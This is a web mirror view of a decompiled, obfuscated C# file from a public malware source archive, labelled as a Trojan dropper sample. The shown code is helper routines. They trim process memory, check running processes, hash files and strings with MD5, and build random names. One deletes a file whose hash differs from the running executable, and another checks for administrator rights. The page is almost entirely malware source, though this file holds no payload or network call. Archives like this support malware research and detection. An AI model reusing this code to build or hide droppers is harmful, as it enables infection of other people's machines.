mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
82 lines
2.5 KiB
C#
82 lines
2.5 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: .
|
|||
|
// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
|
|||
|
|
|||
|
using \u0001;
|
|||
|
using System;
|
|||
|
using System.Diagnostics;
|
|||
|
using System.IO;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
using System.Security.Cryptography;
|
|||
|
using System.Security.Principal;
|
|||
|
using System.Text;
|
|||
|
|
|||
|
namespace \u0008
|
|||
|
{
|
|||
|
internal sealed class \u0008
|
|||
|
{
|
|||
|
[NonSerialized]
|
|||
|
internal static \u0002 \u0001;
|
|||
|
|
|||
|
public void \u000F()
|
|||
|
{
|
|||
|
GC.Collect();
|
|||
|
GC.WaitForPendingFinalizers();
|
|||
|
if (Environment.OSVersion.Platform != PlatformID.Win32NT)
|
|||
|
return;
|
|||
|
\u0008.\u0008.\u000F(Process.GetCurrentProcess().Handle, -1, -1);
|
|||
|
}
|
|||
|
|
|||
|
public bool \u000F([In] string obj0) => Process.GetProcessesByName(obj0).Length > 0;
|
|||
|
|
|||
|
private string \u000F([In] string obj0)
|
|||
|
{
|
|||
|
FileStream inputStream = File.OpenRead(obj0);
|
|||
|
byte[] hash = new MD5CryptoServiceProvider().ComputeHash((Stream) inputStream);
|
|||
|
inputStream.Close();
|
|||
|
return BitConverter.ToString(hash).Replace(\u0008.\u0008.\u0001(1891), \u0008.\u0008.\u0001(948)).ToUpper();
|
|||
|
}
|
|||
|
|
|||
|
public string \u0010([In] string obj0) => BitConverter.ToString(new MD5CryptoServiceProvider().ComputeHash(Encoding.Default.GetBytes(obj0))).Replace(\u0008.\u0008.\u0001(1891), \u0008.\u0008.\u0001(948)).ToUpper();
|
|||
|
|
|||
|
public string \u000F([In] int obj0)
|
|||
|
{
|
|||
|
Random random = new Random();
|
|||
|
string str = \u0008.\u0008.\u0001(2571);
|
|||
|
string empty = string.Empty;
|
|||
|
for (int index = 0; index < obj0; ++index)
|
|||
|
empty += str.Substring(random.Next(0, str.Length), 1);
|
|||
|
return empty;
|
|||
|
}
|
|||
|
|
|||
|
public bool \u0010([In] string obj0)
|
|||
|
{
|
|||
|
if (!File.Exists(obj0))
|
|||
|
return false;
|
|||
|
if (!(this.\u000F(obj0) != this.\u000F(Process.GetCurrentProcess().MainModule.FileName)))
|
|||
|
return true;
|
|||
|
File.Delete(obj0);
|
|||
|
return false;
|
|||
|
}
|
|||
|
|
|||
|
public bool \u000F()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
return new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
return false;
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
[DllImport("kernel32.dll", EntryPoint = "SetProcessWorkingSetSize")]
|
|||
|
private static extern int \u000F([In] IntPtr obj0, [In] int obj1, [In] int obj2);
|
|||
|
|
|||
|
static \u0008() => \u0003.\u000F();
|
|||
|
}
|
|||
|
}
|